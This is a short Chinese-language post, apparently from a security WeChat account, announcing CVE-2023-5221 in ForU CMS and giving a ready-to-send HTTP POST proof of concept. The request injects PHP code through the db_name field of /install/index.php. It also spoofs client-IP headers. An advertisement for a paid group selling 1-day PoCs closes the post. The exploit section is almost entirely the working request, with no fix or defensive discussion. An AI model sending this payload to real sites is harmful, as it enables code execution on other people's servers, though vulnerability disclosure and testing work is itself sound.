免责声明由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
| 0x01 漏洞介绍
ForU CMS是一个开源的内容管理系统,它可以帮助用户快速搭建网站。该漏洞源于 /install/index.php 中,通过参数 db_nam导致代码注入。
| 0x02 影响版本
ForU CMS | 0x03 漏洞复现
POC
POST /install/index.php HTTP/1.1Host: xxxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 160Origin: http://www.forucms.comConnection: closeReferer: http://www.forucms.com/install/index.phpCookie: PHPSESSID=8qv3um38h8smqsghf9hibmu7c7; cms[url_back]=http%3A%2F%2Fwww.forucms.com%2Findex.phpUpgrade-Insecure-Requests: 1X-Forwarded-For: 1.1.1.1X-Originating-IP: 1.1.1.1X-Remote-IP: 1.1.1.1X-Remote-Addr: 1.1.1.1db_host=127.0.0.1&db_name=%27%29%3Bphpinfo%28%29%3B%2F%2F&db_username=1&db_password=1&admin_id=admin&admin_password=admin&db_prefix=cms_&save=%E5%AE%89%E8%A3%85
参考链接
https://github.com/Fovker8/cve/blob/main/rce.md| 知识星球的介绍
不好意思,兄弟们,这里给湘安无事星球打个广告,不喜欢的可以直接滑走哦。添加下面wx加星球可享优惠
1.群主为什么要建知识星球?
很简单为了恰饭哈哈哈,然后也是为了建立一个圈子进行交流学习和共享资源嘛相应的也收取费用嘛,毕竟维持星球也需要精力
2.知识星球有哪些资源?
群里面联系群主是可以要一些免费的学习资料的,因为群里面大部分是大学生嘛大学生不就是喜欢白嫖,所以大家会共享一些资料没有的群主wk也有,wk除了不会pc,其他都能嫖hhh
一些实战报告,截的部分
一些1day的poc,这些也就是信息差,不想找可以让wk帮你们嫖,群主也会经常发
一些共享的资源
1.刀客源码的会员2.fofa 360高级会员3.专属漏洞库5.专属内部it免费课程6.不定期直播分享(星球有录屏)
技术交流可加下方wx
原文始发于微信公众号(WK安全):ForU CMS | CVE-2023-5221(附POC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论